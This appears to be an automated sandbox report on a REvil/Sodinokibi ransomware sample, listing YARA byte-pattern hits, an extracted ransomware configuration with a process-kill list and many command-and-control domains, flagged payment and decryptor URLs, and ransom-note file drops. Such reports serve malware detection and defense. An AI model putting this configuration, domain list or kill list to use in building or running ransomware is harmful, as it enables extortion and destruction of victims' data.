E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x819c:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8c65:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x90e5:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8144:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x88b7:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
0.0.RQzHm5vLxs.exe.d90000.0.unpack	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3db0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x497c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5b27:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8e8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x948e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa526:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
0.0.RQzHm5vLxs.exe.d90000.0.unpack	REvil	REvil Payload	R3MRUM	0x17340:$RE1: expand 32-byte kexpand 16-byte k 0xba30:$RE2: sysshadow 0x105f8:$RE2: sysshadow 0x14270:$RE2: sysshadow 0xba50:$RE3: SCROLLBAR 0x10610:$RE3: SCROLLBAR 0x14288:$RE3: SCROLLBAR 0xba40:$RE4: msctfime ui 0x10604:$RE4: msctfime ui 0x1427c:$RE4: msctfime ui 0xba60:$RE5: \BaseNamedObjects\%S 0x1061c:$RE5: \BaseNamedObjects\%S 0x14294:$RE5: \BaseNamedObjects\%S 0x4d34:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
0.2.RQzHm5vLxs.exe.d90000.0.unpack	JoeSecurity_Revil	Yara detected Revil	Joe Security
0.2.RQzHm5vLxs.exe.d90000.0.unpack	Windows_Ransomware_Sodinokibi_83f05fbe	Identifies SODINOKIBI/REvil ransomware	unknown	0x84bc:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ... 0x17340:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B 0x81f6:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ... 0x917b:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ... 0x8e9c:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ... 0x8071:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ... 0x8e09:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ... 0x19e00:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 0x926c:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ... 0x819c:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ... 0x8c65:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 0x90e5:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A 0x8144:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 0x88b7:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
0.2.RQzHm5vLxs.exe.d90000.0.unpack	Windows_Ransomware_Sodinokibi_a282ba44	Identifies SODINOKIBI/REvil ransomware	unknown	0x3db0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 0x497c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF 0x5b27:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 0x8e8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F 0x948e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 0xa526:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
0.2.RQzHm5vLxs.exe.d90000.0.unpack	REvil	REvil Payload	R3MRUM	0x17340:$RE1: expand 32-byte kexpand 16-byte k 0xba30:$RE2: sysshadow 0x105f8:$RE2: sysshadow 0x14270:$RE2: sysshadow 0xba50:$RE3: SCROLLBAR 0x10610:$RE3: SCROLLBAR 0x14288:$RE3: SCROLLBAR 0xba40:$RE4: msctfime ui 0x10604:$RE4: msctfime ui 0x1427c:$RE4: msctfime ui 0xba60:$RE5: \BaseNamedObjects\%S 0x1061c:$RE5: \BaseNamedObjects\%S 0x14294:$RE5: \BaseNamedObjects\%S 0x4d34:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
Click to see the 3 entries

Sigma Signatures

Spam, unwanted Advertisements and Ransom Demands

Sigma detected: Sodinokibi

Source: Registry Key set

Author: Joe Security: Data: Details: .985drm9, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RQzHm5vLxs.exe, ProcessId: 6232, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\recfg\rnd_ext

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000003.1921990735.0000000002509000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: REvil {"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;skink
Source: 0.2.RQzHm5vLxs.exe.d90000.0.unpack	Malware Configuration Extractor: Sodinokibi {"pk": "N9tiPqA45L8cXACRHlBdJFayV8M5MEF4JjppDRO+oHU=", "pid": "30", "sub": "113", "dbg": false, "fast": true, "wipe": true, "wht": {"fld": ["perflogs", "$windows.~ws", "system volume information", "google", "programdata", "appdata", "windows.old", "windows", "intel", "program files", "application data", "msocache", "mozilla", "$windows.~bt", "boot", "$recycle.bin", "tor browser", "program files (x86)"], "fls": ["ntuser.ini", "thumbs.db", "ntuser.dat", "autorun.inf", "ntldr", "ntuser.dat.log", "bootsect.bak", "boot.ini", "iconcache.db", "bootfont.bin", "desktop.ini"], "ext": ["cpl", "cmd", "diagpkg", "adv", "mod", "ico", "deskthemepack", "msi", "ani", "cab", "theme", "scr", "hlp", "com", "prf", "msp", "exe", "mpa", "diagcab", "key", "386", "hta", "ps1", "nls", "drv", "cur", "dll", "diagcfg", "icl", "bin", "spl", "msc", "lnk", "rom", "bat", "lock", "themepack", "ldf", "nomedia", "msstyles", "rtp", "sys", "msu", "icns", "shs", "ocx", "idx", "wpx", "ics"]}, "wfld": ["backup"], "prc": ["thebat64.exe", "dbsnmp.exe", "mydesktopqos.exe", "wordpad.exe", "sqlwriter.exe", "agntsvc.exe", "winword.exe", "mysqld.exe", "excel.exe", "mysqld_nt.exe", "msaccess.exe", "sqlbrowser.exe", "isqlplussvc.exe", "encsvc.exe", "steam.exe", "infopath.exe", "sqlservr.exe", "oracle.exe", "sqbcoreservice.exe", "thebat.exe", "firefoxconfig.exe", "ocomm.exe", "mydesktopservice.exe", "tbirdconfig.exe", "msftesql.exe", "thunderbird.exe", "onenote.exe", "mspub.exe", "xfssvccon.exe", "dbeng50.exe", "ocautoupds.exe", "visio.exe", "sqlagent.exe", "powerpnt.exe", "synctime.exe", "ocssd.exe", "mysqld_opt.exe", "outlook.exe"], "dmn": "p-ride.live;avtoboss163.ru:443;rarefoods.ro;brownswoodblog.com;patriotcleaning.net;so-sage.fr;katherinealy.com;innovationgames-brabant.nl;eshop.design;drvoip.com;liepertgrafikweb.at;rino-gmbh.com;monstarrsoccer.com;thenalpa.com;thiagoperez.com;fskhjalmar.se;eafx.pro;oncarrot.com;axisoflove.org:443;aquacheck.co.za;bajova.sk;innovationgames-brabant.nl;charlottelhanna.com;ilovefullcircle.com;dnqa.co.uk;catalyseurdetransformation.com;imajyuku-sozoku.com;kelsigordon.com;handyman-silkeborg.dk;pxsrl.it;poems-for-the-soul.ch;jimprattmediations.com;gaearoyals.com;advance-refle.com;pixelhealth.net;electricianul.com;unexplored.gr;look.academy;endlessrealms.net;bonitabeachassociation.com;pro-gamer.pl;donau-guides.eu;9nar.com;hartofurniture.com;silverbird.dk;smartercashsystem.com;pedmanson.com;publicompserver.de;georgemuncey.com;delegationhub.com;kenmccallum.com;rentingwell.com;animation-pro.co.uk;diakonie-weitramsdorf-sesslach.de;hiddensee-buhne11.de;expohomes.com;laylavalentine.com;quitescorting.com;pisofare.co;babysitting-hk.helpergo.co;johnsonweekly.com;jglconsultancy.com;barbaramcfadyenjewelry.com;alnectus.com;matthieupetel.fr;sber-biznes.com;supercarhire.co.uk;sunsolutions.es;the-cupboard.co.uk;computer-place.de;jobstomoveamerica.org;testitjavertailut.net;go.labibini.ch;funworx.de;chatterchatterchatter.com;lsngroupe.com;iexpert99.com;espaciopolitica.com;

Multi AV Scanner detection for submitted file

Source: RQzHm5vLxs.exe

ReversingLabs: Detection: 92%

Antivirus / Scanner detection for submitted sample

Source: RQzHm5vLxs.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://patriotcleaning.net:443/admin/graphic/ervzot.jpgs	Avira URL Cloud: Label: malware
Source: http://decryptor.top/45C1E9BA4D645606	Avira URL Cloud: Label: malware
Source: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/45C1E9BA4D645606	Avira URL Cloud: Label: malware
Source: https://patriotcleaning.net/admin/graphic/ervzot.jpg	Avira URL Cloud: Label: malware
Source: https://patriotcleaning.net/	Avira URL Cloud: Label: malware
Source: https://patriotcleaning.net/W	Avira URL Cloud: Label: malware
Source: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/	Avira URL Cloud: Label: malware
Source: http://decryptor.top/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: RQzHm5vLxs.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D945F6 CryptAcquireContextW,CryptGenRandom,	0_2_00D945F6
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D94C77 CryptBinaryToStringW,CryptBinaryToStringW,	0_2_00D94C77
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Code function: 0_2_00D94C16 CryptStringToBinaryW,CryptStringToBinaryW,	0_2_00D94C16

Source: RQzHm5vLxs.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: C:\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\$winreagent\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\program files\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\program files (x86)\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\recovery\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\$winreagent\scratch\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\favorites\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\onedrive\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\saved games\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\default\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\.ms-ad\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\3d objects\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\contacts\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\favorites\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\onedrive\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\recent\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\saved games\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\searches\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\accountpictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\desktop\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\documents\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\downloads\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\libraries\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\music\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\pictures\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\public\videos\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\bpmlnobvsb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\dvwhkmnfnn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ltkmybseyz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\nebfqqywps\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\onbqclyspu\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\qncycdfijj\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ummbdneqbn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\uoojjozirh\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\vlzdgukutz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\xzxhavgrag\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\zbedcjpbey\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\desktop\ztgjilhxqb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\bpmlnobvsb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\dvwhkmnfnn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ltkmybseyz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\nebfqqywps\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\onbqclyspu\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\qncycdfijj\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ummbdneqbn\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\uoojjozirh\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\vlzdgukutz\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\xzxhavgrag\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\zbedcjpbey\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\documents\ztgjilhxqb\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\favorites\links\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\camera roll\985drm9-readme.txt	Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	File created: c:\users\user\pictures\saved pictures\985drm9-readme.txt	Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.132.175:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.32.57.142:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.93:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.197.111.104:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 137.74.231.3:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Directory created: c:\program files\985drm9-readme.txt			Jump to behavior
Source: C:\Users\user\Desktop\RQzHm5vLxs.exe	Directory created: c:\program files\37db623e.lock			Jump to behavior

Source:	Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: RQzHm5vLxs.exe, 00000000.00000003.2211440830.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, RQzHm5vLxs.exe, 00000000.00000003.2153961554.0000000003B73000.00000004.00000020.00020000.00000000.sdmp
